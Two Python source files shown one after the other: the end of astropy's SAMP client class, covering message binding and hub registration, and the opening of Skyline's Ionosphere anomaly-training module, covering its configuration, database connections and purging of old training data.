msg_params, message)
return ""
def receive_call(self, private_key, sender_id, msg_id, message):
"""
Standard callable client ``receive_call`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_call` method is
used to bind distinct operations to MTypes. In case of a customized
callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
sender_id : str
Sender public ID.
msg_id : str
Message ID received.
message : dict
Received message.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_call(private_key, sender_id, msg_id, message)
def _handle_response(self, private_key, responder_id, msg_tag, response):
if (private_key == self.get_private_key() and
msg_tag in self._response_bindings):
self._response_bindings[msg_tag](private_key, responder_id,
msg_tag, response)
return ""
def receive_response(self, private_key, responder_id, msg_tag, response):
"""
Standard callable client ``receive_response`` method.
This method is automatically handled when the
:meth:`~astropy.samp.client.SAMPClient.bind_receive_response` method
is used to bind distinct operations to MTypes. In case of a customized
callable client implementation that inherits from the
:class:`~astropy.samp.SAMPClient` class this method should be
overwritten.
.. note:: When overwritten, this method must always return
a string result (even empty).
Parameters
----------
private_key : str
Client private key.
responder_id : str
Responder public ID.
msg_tag : str
Response message tag.
response : dict
Received response.
Returns
-------
confirmation : str
Any confirmation string.
"""
return self._handle_response(private_key, responder_id, msg_tag,
response)
def bind_receive_message(self, mtype, function, declare=True,
metadata=None):
"""
Bind a specific MType to a function or class method, to be used for
both calls and notifications.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, msg_id,
mtype, params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``msg_id`` is the Hub message-id (calls only,
otherwise is `None`), ``mtype`` is the message MType, ``params`` is the
message parameter set (content of ``"samp.params"``) and ``extra`` is a
dictionary containing any extra message map entry. The client is
automatically declared subscribed to the MType by default.
Parameters
----------
mtype : str
MType to be caught.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
self.bind_receive_call(mtype, function, declare=declare,
metadata=metadata)
self.bind_receive_notification(mtype, function, declare=declare,
metadata=metadata)
def bind_receive_notification(self, mtype, function, declare=True, metadata=None):
"""
Bind a specific MType notification to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, mtype,
params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``mtype`` is the message MType, ``params`` is
the notified message parameter set (content of ``"samp.params"``) and
``extra`` is a dictionary containing any extra message map entry. The
client is automatically declared subscribed to the MType by default.
Parameters
----------
mtype : str
MType to be caught.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
if not metadata:
metadata = {}
self._notification_bindings[mtype] = [function, metadata]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def bind_receive_call(self, mtype, function, declare=True, metadata=None):
"""
Bind a specific MType call to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, sender_id, msg_id,
mtype, params, extra)
where ``private_key`` is the client private-key, ``sender_id`` is the
notification sender ID, ``msg_id`` is the Hub message-id, ``mtype`` is
the message MType, ``params`` is the message parameter set (content of
``"samp.params"``) and ``extra`` is a dictionary containing any extra
message map entry. The client is automatically declared subscribed to
the MType by default.
Parameters
----------
mtype : str
MType to be caught.
function : callable
Application function to be used when ``mtype`` is received.
declare : bool, optional
Specify whether the client must be automatically declared as
subscribed to the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
metadata : dict, optional
Dictionary containing additional metadata to declare associated
with the MType subscribed to (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
if not metadata:
metadata = {}
self._call_bindings[mtype] = [function, metadata]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def bind_receive_response(self, msg_tag, function):
"""
Bind a specific msg-tag response to a function or class method.
The function must be of the form::
def my_function_or_method(<self,> private_key, responder_id,
msg_tag, response)
where ``private_key`` is the client private-key, ``responder_id`` is
the message responder ID, ``msg_tag`` is the message-tag provided at
call time and ``response`` is the response received.
Parameters
----------
msg_tag : str
Message-tag to be caught.
function : callable
Application function to be used when ``msg_tag`` is received.
"""
if self._callable:
self._response_bindings[msg_tag] = function
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_notification(self, mtype, declare=True):
"""
Remove from the notifications binding table the specified MType and
unsubscribe the client from it (if required).
Parameters
----------
mtype : str
MType to be removed.
declare : bool
Specify whether the client must be automatically declared as
unsubscribed from the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
del self._notification_bindings[mtype]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_call(self, mtype, declare=True):
"""
Remove from the calls binding table the specified MType and unsubscribe
the client from it (if required).
Parameters
----------
mtype : str
MType to be removed.
declare : bool
Specify whether the client must be automatically declared as
unsubscribed from the MType (see also
:meth:`~astropy.samp.client.SAMPClient.declare_subscriptions`).
"""
if self._callable:
del self._call_bindings[mtype]
if declare:
self._declare_subscriptions()
else:
raise SAMPClientError("Client not callable.")
def unbind_receive_response(self, msg_tag):
"""
Remove from the responses binding table the specified message-tag.
Parameters
----------
msg_tag : str
Message-tag to be removed.
"""
if self._callable:
del self._response_bindings[msg_tag]
else:
raise SAMPClientError("Client not callable.")
def declare_subscriptions(self, subscriptions=None):
"""
Declares the MTypes the client wishes to subscribe to, implicitly
defined with the MType binding methods
:meth:`~astropy.samp.client.SAMPClient.bind_receive_notification`
and :meth:`~astropy.samp.client.SAMPClient.bind_receive_call`.
An optional ``subscriptions`` map can be added to the final map passed
to the :meth:`~astropy.samp.hub_proxy.SAMPHubProxy.declare_subscriptions`
method.
Parameters
----------
subscriptions : dict, optional
Dictionary containing the list of MTypes to subscribe to, with the
same format of the ``subscriptions`` map passed to the
:meth:`~astropy.samp.hub_proxy.SAMPHubProxy.declare_subscriptions`
method.
"""
if self._callable:
self._declare_subscriptions(subscriptions)
else:
raise SAMPClientError("Client not callable.")
def register(self):
"""
Register the client to the SAMP Hub.
"""
if self.hub.is_connected:
if self._private_key is not None:
raise SAMPClientError("Client already registered")
result = self.hub.register(self.hub.lockfile["samp.secret"])
if result["samp.self-id"] == "":
raise SAMPClientError("Registration failed - "
"samp.self-id was not set by the hub.")
if result["samp.private-key"] == "":
raise SAMPClientError("Registration failed - "
"samp.private-key was not set by the hub.")
self._public_id = result["samp.self-id"]
self._private_key = result["samp.private-key"]
self._hub_id = result["samp.hub-id"]
if self._callable:
self._set_xmlrpc_callback()
self._declare_subscriptions()
if self._metadata != {}:
self.declare_metadata()
self._is_registered = True
else:
raise SAMPClientError("Unable to register to the SAMP Hub. "
"Hub proxy not connected.")
def unregister(self):
"""
Unregister the client from the SAMP Hub.
"""
if self.hub.is_connected:
self._is_registered = False
self.hub.unregister(self._private_key)
self._hub_id = None
self._public_id = None
self._private_key = None
else:
raise SAMPClientError("Unable to unregister from the SAMP Hub. "
"Hub proxy not connected.")
def _set_xmlrpc_callback(self):
if self.hub.is_connected and self._private_key is not None:
self.hub.set_xmlrpc_callback(self._private_key,
self._xmlrpcAddr)
def _declare_subscriptions(self, subscriptions=None):
if self.hub.is_connected and self._private_key is not None:
mtypes_dict = {}
# Collect notification mtypes and metadata
for mtype in self._notification_bindings.keys():
mtypes_dict[mtype] = copy.deepcopy(self._notification_bindings[mtype][1])
# Collect call mtypes and metadata
for mtype in self._call_bindings.keys():
mtypes_dict[mtype] = copy.deepcopy(self._call_bindings[mtype][1])
# Add optional subscription map
if subscriptions:
mtypes_dict.update(copy.deepcopy(subscriptions))
self.hub.declare_subscriptions(self._private_key, mtypes_dict)
else:
raise SAMPClientError("Unable to declare subscriptions. Hub "
"unreachable or not connected or client "
"not registered.")
def declare_metadata(self, metadata=None):
"""
Declare the client application metadata supported.
Parameters
----------
metadata : dict, optional
Dictionary containing the client application metadata as defined in
the SAMP definition document. If omitted, then no metadata are
declared.
"""
if self.hub.is_connected and self._private_key is not None:
if metadata is not None:
self._metadata.update(metadata)
self.hub.declare_metadata(self._private_key, self._metadata)
else:
raise SAMPClientError("Unable to declare metadata. Hub "
"unreachable or not connected or client "
"not registered.")
def get_private_key(self):
"""
Return the client private key used for the Standard Profile
communications obtained at registration time (``samp.private-key``).
Returns
-------
key : str
Client private key.
"""
return self._private_key
def get_public_id(self):
"""
Return public client ID obtained at registration time
(``samp.self-id``).
Returns
-------
id : str
Client public ID.
"""
return self._public_id
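# Hedged usage sketch (illustrative only, not part of the astropy.samp API):
# how a callable client is typically wired to an already-connected
# `~astropy.samp.SAMPHubProxy`. The MType and handler names below are
# assumptions made for the example.
def _example_usage(hub_proxy):
    """Sketch of the register/bind/unregister life cycle (never called here)."""
    client = SAMPClient(hub_proxy, name="example-client",
                        description="SAMPClient usage sketch")
    client.start()
    client.register()
    def on_table(private_key, sender_id, mtype, params, extra):
        # Notification handlers take five arguments (see
        # bind_receive_notification); call handlers also receive msg_id.
        print("notified:", mtype, params)
    client.bind_receive_notification("table.load.votable", on_table)
    # ... exchange messages with other clients via the hub ...
    client.unregister()
    client.stop()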
|
ionosphere.py
|
from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
# @modified 20191115 - Branch #3262: py3
# try:
# from Queue import Empty
# except:
# from queue import Empty
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
import re
from shutil import rmtree
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
from shutil import move as shutil_move
# import csv
from ast import literal_eval
from datetime import datetime
# from redis import StrictRedis
import traceback
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# extract_features, ReasonableFeatureExtractionSettings)
extract_features, EfficientFCParameters)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# get_memcache_metric_object)
mkdir_p,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
is_batch_metric)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# metrics_table_meta,
ionosphere_matched_table_meta,
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# Readded metrics_table to set ionosphere_enabled to 0 if a metric has no
# fps enabled and has been willy nillied
metrics_table_meta)
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
# @added 20190322 - Feature #2484: FULL_DURATION feature profiles
from common_functions import (
get_metrics_db_object, get_calculated_features)
# @added 20190327 - Feature #2484
from echo import ionosphere_echo
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
IONOSPHERE_PROCESSES = settings.IONOSPHERE_PROCESSES
if IONOSPHERE_PROCESSES != 1:
IONOSPHERE_PROCESSES = 1
except:
IONOSPHERE_PROCESSES = 1
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However, which Skyline related metrics are feeding
# back is quite difficult to ascertain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
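# For illustration only (hypothetical host name): with
# settings.GRAPHITE_HOST set to 'graphite-01.example.com', the fallback
# below would guess SKYLINE_FEEDBACK_NAMESPACES as
# [settings.SERVER_METRICS_NAME, 'graphite-01']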
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
try:
IONOSPHERE_MANAGE_PURGE = settings.IONOSPHERE_MANAGE_PURGE
except:
IONOSPHERE_MANAGE_PURGE = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import BATCH_PROCESSING_NAMESPACES
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
try:
IONOSPHERE_HISTORICAL_DATA_FOLDER = settings.IONOSPHERE_HISTORICAL_DATA_FOLDER
except:
IONOSPHERE_HISTORICAL_DATA_FOLDER = '/opt/skyline/ionosphere/historical_data'
try:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = settings.IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
except:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = []
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': settings.PANORAMA_DBUSERPASS,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Define Redis, mysql and memcached connections
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added single functions to deal with the Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
# self.not_anomalous = Manager().list()
# self.features_profiles_checked = Manager().list()
# self.training_metrics = Manager().list()
# self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# self.ionosphere_smtp_alerter_metrics = Manager().list()
# self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
# self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warning('warning :: parent or current process dead')
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('Cleaning old training data from %s older than %s seconds' % (
dir_path, str(older_than)))
else:
logger.info('IONOSPHERE_MANAGE_PURGE set to False, managing ionosphere.training_data only, not purging')
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# If training_data is not purged and contains the correct training_data
# files, add it to the list to be added to the Redis set
training_data_list = []
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occasional logging for monitoring
last_log_time = int(time_now)
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occasional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('still purging')
else:
logger.info('still managing ionosphere.training_data')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report the app as up so that other apps do not fail to find the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
if re.match(r'\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
if (time_now - os.path.getmtime(folder_path)) > older_than:
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
if IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
for rpath, rfolders, rfiles in os.walk(folder_path):
for rfolder in rfolders[:]:
current_folder = os.path.join(rpath, rfolder)
for rrpath, rrfolders, rrfiles in os.walk(current_folder):
move_files = False
training_files_dirs = []
if len(rrfiles) > 0:
for rfile in rrfiles:
for include_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if include_namespace in rfile:
move_files = True
if move_files:
training_files_dirs.append(rrpath)
if training_files_dirs:
try:
dest_path = rrpath.replace(dir_path, IONOSPHERE_HISTORICAL_DATA_FOLDER)
if not os.path.exists(dest_path):
mkdir_p(dest_path)
training_files = []
for training_files_dir in training_files_dirs:
training_files = os.listdir(training_files_dir)
for f in training_files:
src_file = '%s/%s' % (training_files_dir, f)
dest_file = '%s/%s' % (dest_path, f)
shutil_move(src_file, dest_file)
files_moved = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to move files from %s to %s' % (current_folder, IONOSPHERE_HISTORICAL_DATA_FOLDER))
files_moved = False
if files_moved:
try:
rmtree(rrpath)
logger.info('removed - %s as files were moved to %s' % (rrpath, dest_path))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to rmtree %s' % rrpath)
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
# @added 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('cleaned old training data')
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declare training_data_instances even if no training_data_list exists
# as it can be appended to by the historical training data
training_data_instances = []
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
if training_data_list:
training_data_instances = []
for training_data_dir in training_data_list:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occasional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report the app as up so that other apps do not fail to find the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(training_data_dir):
# @modified 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Wrapped in try and except
try:
add_folder = False
metric = None
timestamp = None
if files:
add_folder = False
metric = None
timestamp = None
# @added 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declared these first for all
metric_file = None
metric_file_path = None
if '/learn/' in path:
# @modified 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# metric_file = None
# metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match(r'\d{10}', element):
timestamp = int(element)
if metric and timestamp:
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine and add resolution
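# Illustrative example (hypothetical filename, not from the source): a
# Graphite png named like 'metric.mirage.graphite.168h.png' yields
# ifile_resolution_str = '168h', ifile_resolution = 168 and therefore
# resolution_seconds = 168 * 3600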
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# training_data_instances.append([metric, timestamp])
training_data_instances.append([metric, timestamp, resolution_seconds])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# If the IONOSPHERE_HISTORICAL_DATA_FOLDER dir exists iterate it and
# add historical training data to the list.
if os.path.exists(IONOSPHERE_HISTORICAL_DATA_FOLDER) and IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
historical_training_data_added = 0
if training_data_instances:
training_data_count = len(training_data_instances)
logger.info('There are %s training_data instances before iterating historical training data' % (str(training_data_count)))
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(IONOSPHERE_HISTORICAL_DATA_FOLDER):
try:
add_folder = False
metric = None
timestamp = None
historical_metric_data = False
if files:
for historical_metric_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if historical_metric_data:
continue
for ifile in files:
if historical_metric_namespace in ifile:
historical_metric_data = True
break
if historical_metric_data:
add_folder = False
metric = None
timestamp = None
if '/learn/' in path:
metric_file = None
metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match(r'\d{10}', element):
timestamp = int(element)
if metric and timestamp:
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
training_data_instances.append([metric, timestamp, resolution_seconds])
historical_training_data_added += 1
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate historical training_dir - %s' % str(path))
